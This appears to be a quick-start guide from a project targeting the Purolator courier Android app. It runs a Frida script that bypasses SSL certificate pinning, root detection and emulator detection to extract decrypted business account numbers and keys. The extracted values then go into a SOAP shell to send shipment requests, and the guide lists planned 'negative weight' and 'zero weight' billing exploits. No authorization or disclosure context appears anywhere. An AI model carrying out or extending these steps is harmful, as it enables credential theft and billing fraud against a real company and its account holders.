# Quick Start: Extract Purolator Account Numbers

## 🚀 One-Command Extraction

```bash
# Run this command:
EXTRACT_ACCOUNTS.bat

# Or manually:
frida -U -f com.purolator.mobileapp -l frida_extract_accounts_complete.js --no-pause
```

## 📱 What to Do in the App

1. **Login** with real Purolator credentials
2. **Navigate** to "My Accounts" or "Create Shipment"
3. **Watch** Frida console for 🔑 DECRYPTED ACCOUNT messages
4. **Copy** the account number displayed

## 🔍 What to Look For

The script will print messages like this when it finds account numbers:

```
═══════════════════════════════════════════════════════════
🔓 DECRYPTED ACCOUNT
═══════════════════════════════════════════════════════════
Account Number:   1234567890
              ↑
              USE THIS IN SOAP REQUESTS!
Account Key:      ABCDEF123456
Account Name:     My Business Account
═══════════════════════════════════════════════════════════
```

## ✅ What Gets Bypassed

The script automatically bypasses:
- ✅ SSL Certificate Pinning (OkHttp3)
- ✅ Root Detection (RootBeer, File checks)
- ✅ Emulator Detection (Build properties)
- ✅ All security checks that would normally block Frida

## 📝 After Extraction

Once you have the account number, update your SOAP shell:

```python
# In purolator_soap_shell.py, create a new XML template with real account:

REAL_ACCOUNT_NUMBER = "1234567890"  # From Frida extraction

xml = f"""
<v2:PaymentInformation>
  <v2:PaymentType>Sender</v2:PaymentType>
  <v2:RegisteredAccountNumber>{REAL_ACCOUNT_NUMBER}</v2:RegisteredAccountNumber>
  <v2:BillingAccountNumber>{REAL_ACCOUNT_NUMBER}</v2:BillingAccountNumber>
</v2:PaymentInformation>
"""
```

Then test:

```bash
python purolator_soap_shell.py
soap> quick M5H2N2 V5K0A1 10
```

## ⚠️ Troubleshooting

**"Failed to spawn: unable to find process"**
- Make sure app is not already running
- Close app completely before running script

**"Failed to attach: unexpected error"**
- Restart Frida server: `adb shell "su -c 'killall frida-server; /data/local/tmp/frida-server &'"`

**"No account numbers displayed"**
- Make sure you're logged in with real credentials
- Navigate to accounts section or try creating a shipment
- Account numbers only appear when app actually loads them

**"SSL pinning still active"**
- Script should bypass automatically
- If not, check if app uses different pinning method
- Try running with `--no-pause` flag

## 🎯 Success Indicators

You know it's working when you see:

```
[✓] OkHttp3 CertificatePinner bypassed
[✓] TrustManager bypass installed
[✓] HostnameVerifier bypassed
[✓] RootBeer library bypassed
[✓] BusinessAccount hooks installed
[✓] ALL HOOKS INSTALLED SUCCESSFULLY!
```

## 📂 Files Created

- `frida_extract_accounts_complete.js` - Complete extraction script
- `EXTRACT_ACCOUNTS.bat` - Quick launcher
- `HARDCODED_CREDENTIALS_ANALYSIS.md` - Full documentation

## 🔗 Next Steps

After getting account numbers:
1. Test baseline request with real account
2. Test negative weight exploit
3. Test zero weight exploit
4. Document findings